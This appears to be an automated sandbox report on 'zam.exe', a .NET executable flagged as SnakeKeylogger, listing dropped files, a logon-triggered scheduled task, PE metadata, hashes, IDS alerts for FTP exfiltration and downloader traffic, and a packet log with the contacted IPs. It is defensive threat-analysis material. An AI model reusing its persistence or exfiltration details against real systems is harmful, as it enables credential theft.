File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1573
Entropy (8bit):	5.118482168709091
Encrypted:	false
SSDEEP:	48:cge7XQBBYrFdOFzOzN33ODOiDdKrsuT6Iv:He7XQBBYrFdOFzOz6dKrsuh
MD5:	B713FABF8BE2616EA597DA1EA90A4486
SHA1:	0A50A01782BC35D45F5A3B2C9E188C339F498C39
SHA-256:	70EB3AA28DABAE7F6D42FBE7F6051437CE92F1ACC394AE01C43FA2355476EE23
SHA-512:	3CB7131BB2719612AD878268A26884397F4243FB4BE14AB4AC6B0111C825A8C9BFC0210229F855BD423DB266B21C4BE9AA63BB039D035E1EDEE1AFD0A16D1AF3
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvailable>f

C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe

Download File

Process:	C:\Users\user\Desktop\zam.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	728576
Entropy (8bit):	7.928931702683381
Encrypted:	false
SSDEEP:	12288:eEEH0GapWzLehoBHUsu4xifZ6R6auv2VLEN714g2OkvqHbFweV:XEH4pBhtHhm61uLEN7urSbFwe
MD5:	6CCD423ABCF6BB68539F4C70419D6FC3
SHA1:	450D3110F5ECA86F20823B61A4EF43FE5F35EDD4
SHA-256:	4BEC8930B1157E64E7D785C62F4FCC4D5D144DAEB954144EE3F3A5648820A9A2
SHA-512:	7FC9AC53AB49470C812155AB184BB2E260DE2B618492A8CFC507A7520A331327BDD553A639201DA085324D8F2BBE8C9E9B20B4528F3B2E5F9AECE323AD47D196
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 45%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....-g.............................!... ........@.. ....................................@.................................. ..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................. ......H............L....../....................................................0..A....... .........%.,...(.....-... .........%.....(.........(.........&....0..C.......~-....+/.E.............................&. .......Q.Y.+..{....{;.....0.............{.....};........&...0..<.......~-....+-.E.............................&. .......Y.+..{....>..}.........&.0..B........s....}.......{.....};.....!........ Q....(....}.....(.........&..6(.........&...0..........~......~-.......

C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\zam.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.928931702683381
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	zam.exe
File size:	728'576 bytes
MD5:	6ccd423abcf6bb68539f4c70419d6fc3
SHA1:	450d3110f5eca86f20823b61a4ef43fe5f35edd4
SHA256:	4bec8930b1157e64e7d785c62f4fcc4d5d144daeb954144ee3f3a5648820a9a2
SHA512:	7fc9ac53ab49470c812155ab184bb2e260de2b618492a8cfc507a7520a331327bdd553a639201da085324d8f2bbe8c9e9b20b4528f3b2e5f9aece323ad47d196
SSDEEP:	12288:eEEH0GapWzLehoBHUsu4xifZ6R6auv2VLEN714g2OkvqHbFweV:XEH4pBhtHhm61uLEN7urSbFwe
TLSH:	A9F4230F5F2AD966CA0C0973E423345813BE4D42EC7BF3AA198D6DF21577D58C8A7622
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....-g.............................!... ........@.. ....................................@................................

File Icon


Icon Hash:	26b6dac84c6c3e03

Static PE Info

General

Entrypoint:	0x4b210e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x672DC8BC [Fri Nov 8 08:15:56 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb20b8	0x53	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xb4000	0x1800	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xb6000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xb0114	0xb0200	137b19eab1bb749796c6ca28ba99c68f	False	0.9575995830376153	SysEx File -	7.943442272607826	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xb4000	0x1800	0x1800	cfc31b19c4247909e889193b693fcda8	False	0.4475911458333333	data	4.617835100949816	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xb6000	0xc	0x200	89187d059f892d17b654ab5106d9b287	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xb4118	0x1200	Device independent bitmap graphic, 32 x 64 x 32, image size 0	0.4939236111111111
RT_GROUP_ICON	0xb5318	0x14	data	1.0
RT_GROUP_ICON	0xb532c	0x14	data	1.05
RT_VERSION	0xb5340	0x30e	data	0.4360613810741688

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-08T16:15:16.595729+0100	2845532	ETPRO MALWARE SnakeKeylogger Exfil via FTP M1	1	192.168.2.10	49833	50.31.176.103	21	TCP
2024-11-08T16:15:25.126913+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.10	49706	158.101.44.242	80	TCP
2024-11-08T16:15:26.396184+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.10	49706	158.101.44.242	80	TCP
2024-11-08T16:15:27.027738+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.10	49710	188.114.96.3	443	TCP
2024-11-08T16:15:27.767343+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.10	49711	158.101.44.242	80	TCP
2024-11-08T16:15:28.443066+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.10	49715	188.114.96.3	443	TCP
2024-11-08T16:15:28.908175+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.10	49719	158.101.44.242	80	TCP
2024-11-08T16:15:29.306360+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.10	49720	158.101.44.242	80	TCP
2024-11-08T16:15:30.408169+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.10	49719	158.101.44.242	80	TCP
2024-11-08T16:15:31.134845+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.10	49739	188.114.96.3	443	TCP
2024-11-08T16:15:32.845663+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.10	49742	158.101.44.242	80	TCP
2024-11-08T16:15:33.579732+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.10	49753	188.114.96.3	443	TCP
2024-11-08T16:15:35.283168+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.10	49759	158.101.44.242	80	TCP
2024-11-08T16:15:36.533636+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.10	49778	188.114.96.3	443	TCP
2024-11-08T16:15:37.586548+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.10	49786	188.114.96.3	443	TCP
2024-11-08T16:15:37.933564+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.10	49788	188.114.96.3	443	TCP
2024-11-08T16:15:39.033605+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.10	49800	188.114.96.3	443	TCP
2024-11-08T16:15:41.898974+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.10	49822	188.114.96.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 8, 2024 16:15:16.595729113 CET	49674	443	192.168.2.10	173.222.162.55
Nov 8, 2024 16:15:16.600241899 CET	49675	443	192.168.2.10	173.222.162.55
Nov 8, 2024 16:15:17.689538956 CET	49671	443	192.168.2.10	204.79.197.203
Nov 8, 2024 16:15:21.434576988 CET	49677	443	192.168.2.10	20.42.65.85
Nov 8, 2024 16:15:21.743335009 CET	49677	443	192.168.2.10	20.42.65.85
Nov 8, 2024 16:15:22.345644951 CET	49677	443	192.168.2.10	20.42.65.85
Nov 8, 2024 16:15:22.501907110 CET	49671	443	192.168.2.10	204.79.197.203
Nov 8, 2024 16:15:23.549096107 CET	49677	443	192.168.2.10	20.42.65.85
Nov 8, 2024 16:15:24.233795881 CET	49706	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:24.238756895 CET	80	49706	158.101.44.242	192.168.2.10
Nov 8, 2024 16:15:24.238854885 CET	49706	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:24.239162922 CET	49706	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:24.244040012 CET	80	49706	158.101.44.242	192.168.2.10
Nov 8, 2024 16:15:24.876744986 CET	80	49706	158.101.44.242	192.168.2.10
Nov 8, 2024 16:15:24.882141113 CET	49706	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:24.887046099 CET	80	49706	158.101.44.242	192.168.2.10
Nov 8, 2024 16:15:25.027651072 CET	80	49706	158.101.44.242	192.168.2.10
Nov 8, 2024 16:15:25.126913071 CET	49706	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:25.132622957 CET	49707	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:25.132662058 CET	443	49707	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:25.133054018 CET	49707	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:25.161910057 CET	49707	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:25.161927938 CET	443	49707	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:25.253365993 CET	49708	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:25.253427029 CET	443	49708	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:25.253493071 CET	49708	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:25.253993034 CET	49708	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:25.254004002 CET	443	49708	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:25.776087046 CET	443	49707	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:25.776237965 CET	49707	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:25.783227921 CET	49707	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:25.783252001 CET	443	49707	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:25.783639908 CET	443	49707	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:25.835025072 CET	49707	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:25.875339985 CET	443	49707	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:25.978723049 CET	443	49707	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:25.978823900 CET	443	49707	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:25.979228020 CET	49707	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:25.997378111 CET	443	49708	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:25.997435093 CET	49708	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:26.001935959 CET	49677	443	192.168.2.10	20.42.65.85
Nov 8, 2024 16:15:26.002747059 CET	49708	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:26.002758980 CET	443	49708	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:26.003014088 CET	443	49708	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:26.015726089 CET	49707	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:26.068818092 CET	49708	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:26.086036921 CET	49706	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:26.091097116 CET	80	49706	158.101.44.242	192.168.2.10
Nov 8, 2024 16:15:26.111337900 CET	443	49708	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:26.220681906 CET	49674	443	192.168.2.10	173.222.162.55
Nov 8, 2024 16:15:26.220696926 CET	49675	443	192.168.2.10	173.222.162.55
Nov 8, 2024 16:15:26.235488892 CET	80	49706	158.101.44.242	192.168.2.10
Nov 8, 2024 16:15:26.238158941 CET	49710	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:26.238215923 CET	443	49710	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:26.238285065 CET	49710	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:26.238769054 CET	49710	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:26.238784075 CET	443	49710	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:26.316379070 CET	443	49708	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:26.316405058 CET	443	49708	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:26.316411972 CET	443	49708	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:26.316425085 CET	443	49708	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:26.316431046 CET	443	49708	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:26.316437960 CET	443	49708	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:26.316461086 CET	49708	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:26.316498041 CET	443	49708	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:26.316512108 CET	49708	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:26.316539049 CET	49708	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:26.396183968 CET	49706	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:26.435228109 CET	443	49708	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:26.435256004 CET	443	49708	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:26.435339928 CET	49708	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:26.435370922 CET	443	49708	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:26.435410976 CET	49708	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:26.553788900 CET	443	49708	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:26.553812981 CET	443	49708	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:26.553863049 CET	49708	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:26.553905010 CET	443	49708	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:26.553919077 CET	49708	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:26.554004908 CET	49708	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:26.672821999 CET	443	49708	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:26.672852039 CET	443	49708	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:26.672915936 CET	49708	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:26.672940016 CET	443	49708	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:26.672962904 CET	49708	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:26.672981977 CET	49708	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:26.791678905 CET	443	49708	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:26.791703939 CET	443	49708	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:26.791733980 CET	49708	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:26.791790962 CET	49708	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:26.791796923 CET	443	49708	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:26.791835070 CET	49708	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:26.872878075 CET	443	49710	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:26.875883102 CET	49710	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:26.875924110 CET	443	49710	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:26.909967899 CET	443	49708	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:26.910000086 CET	443	49708	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:26.910068035 CET	49708	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:26.910094023 CET	443	49708	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:26.910109997 CET	49708	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:26.910130978 CET	49708	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:27.027753115 CET	443	49710	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:27.027846098 CET	443	49710	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:27.027942896 CET	49710	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:27.028418064 CET	49710	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:27.029057980 CET	443	49708	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:27.029083014 CET	443	49708	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:27.029126883 CET	49708	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:27.029146910 CET	443	49708	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:27.029189110 CET	49708	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:27.032593012 CET	49706	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:27.033776045 CET	49711	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:27.037728071 CET	80	49706	158.101.44.242	192.168.2.10
Nov 8, 2024 16:15:27.037781954 CET	49706	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:27.038630009 CET	80	49711	158.101.44.242	192.168.2.10
Nov 8, 2024 16:15:27.038760900 CET	49711	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:27.038906097 CET	49711	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:27.044009924 CET	80	49711	158.101.44.242	192.168.2.10
Nov 8, 2024 16:15:27.106914043 CET	443	49708	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:27.106951952 CET	443	49708	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:27.107003927 CET	49708	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:27.107033014 CET	443	49708	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:27.107044935 CET	49708	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:27.107076883 CET	49708	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:27.224400997 CET	443	49708	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:27.224451065 CET	443	49708	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:27.224595070 CET	49708	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:27.224622011 CET	443	49708	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:27.224666119 CET	49708	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:27.267261028 CET	443	49708	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:27.267291069 CET	443	49708	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:27.267391920 CET	49708	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:27.267407894 CET	443	49708	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:27.267447948 CET	49708	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:27.385116100 CET	443	49708	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:27.385145903 CET	443	49708	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:27.385198116 CET	49708	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:27.385227919 CET	443	49708	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:27.385241032 CET	49708	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:27.385471106 CET	49708	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:27.503535986 CET	443	49708	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:27.503561974 CET	443	49708	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:27.503622055 CET	49708	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:27.503644943 CET	443	49708	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:27.503679991 CET	49708	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:27.580210924 CET	443	49708	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:27.580235004 CET	443	49708	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:27.580346107 CET	49708	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:27.580368996 CET	443	49708	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:27.580410004 CET	49708	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:27.622243881 CET	443	49708	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:27.622318029 CET	49708	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:27.622319937 CET	443	49708	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:27.622360945 CET	49708	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:27.624953985 CET	49708	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:27.624974012 CET	443	49708	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:27.625024080 CET	49708	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:27.625030041 CET	443	49708	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:27.681644917 CET	49713	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:27.681694984 CET	443	49713	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:27.681910992 CET	49713	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:27.683389902 CET	49714	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:27.683403969 CET	443	49714	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:27.683449984 CET	49714	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:27.684015036 CET	49713	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:27.684037924 CET	443	49713	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:27.684133053 CET	49714	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:27.684138060 CET	443	49714	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:27.684966087 CET	80	49711	158.101.44.242	192.168.2.10
Nov 8, 2024 16:15:27.686105013 CET	49715	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:27.686134100 CET	443	49715	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:27.686229944 CET	49715	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:27.686460018 CET	49715	443	192.168.2.10	188.114.96.3
Nov 8, 2024 16:15:27.686469078 CET	443	49715	188.114.96.3	192.168.2.10
Nov 8, 2024 16:15:27.686773062 CET	49716	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:27.686800957 CET	443	49716	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:27.686865091 CET	49716	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:27.686999083 CET	49716	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:27.687006950 CET	443	49716	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:27.688054085 CET	49717	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:27.688080072 CET	443	49717	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:27.688173056 CET	49717	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:27.688278913 CET	49717	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:27.688292027 CET	443	49717	13.107.246.45	192.168.2.10
